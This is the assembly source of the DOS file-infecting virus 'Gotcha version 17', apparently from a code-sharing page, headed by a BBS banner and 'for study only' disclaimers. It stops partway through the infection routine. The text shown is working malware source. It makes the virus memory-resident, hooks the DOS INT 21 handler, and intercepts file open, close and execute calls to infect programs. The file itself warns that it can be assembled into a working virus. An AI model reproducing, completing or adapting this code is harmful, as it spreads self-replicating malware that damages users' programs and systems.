📄 gotcha17.asm
字号:
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d
FILELEN equ end - start
RESPAR equ (FILELEN/16d) + 18d
BUFLEN equ 18
ENVLEN equ signature- envstring
COMSIGN equ 0
EXESIGN equ 1
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 0100
begin: db 0E9, BUFLEN+1, 0 ;jump to virus entry
;****************************************************************************
;* Data
;****************************************************************************
org 0103
start:
buffer db 0CDh, 20 ;original code
db (BUFLEN-2) dup (?)
comexe db COMSIGN ;dummy program is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
call start2
start2: pop si
sub si,(BUFLEN+4) ;si = begin virus
mov di,0100
cld
cmp byte ptr cs:[si+BUFLEN],COMSIGN
jz entryC
entryE: mov ax,ds ;calculate CS
add ax,10
add ax,cs:[si+16]
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack
jmp short entcheck
entryC: push cs ;push new CS on stack
push di ;push new IP on stack
push di
push si
movsw ;restore old file-begin
movsb
pop si
pop di
entcheck: mov ax,0DADA ;already installed?
int 21
cmp ah,0A5
je entstop
mov ax,3000 ;test DOS version >= 3.1?
int 21
xchg ah,al
cmp ax,030A
jb entstop
push ds
push es
mov ax,ds ;adjust memory-size
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A
jnz cancel
mov ax,ds:[0003]
sub ax,low RESPAR
jb cancel
mov ds:[0003],ax
sub word ptr ds:[0012],low RESPAR
mov es,ds:[0012] ;copy program to top
push cs
pop ds
mov cx,FILELEN
rep movsb
mov ds,cx ;get original int21 vector
mov si,4*21
movsw ;move it to the end
movsw
push es ;set vector to new handler
pop ds
mov dx,offset ni21-3
mov ax,2521
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf
;****************************************************************************
;* Interupt 24 handler
;****************************************************************************
ni24: mov al,3
iret
;****************************************************************************
;* Interupt 21 handler
;****************************************************************************
ni21: pushf
cmp ax,0DADA ;install-check ?
je do_DADA
push dx
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;duplicate handle
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;open the file
doit: int 21
jc exit
xchg ax,bx
call infect
exit: pop es
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;call to old int-handler
do_DADA: mov ax,0A500+VERSION ;return a signature
popf
iret
;****************************************************************************
;* Close the file
;****************************************************************************
close: mov ah,3E ;close the file
pushf
push cs
call org21
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -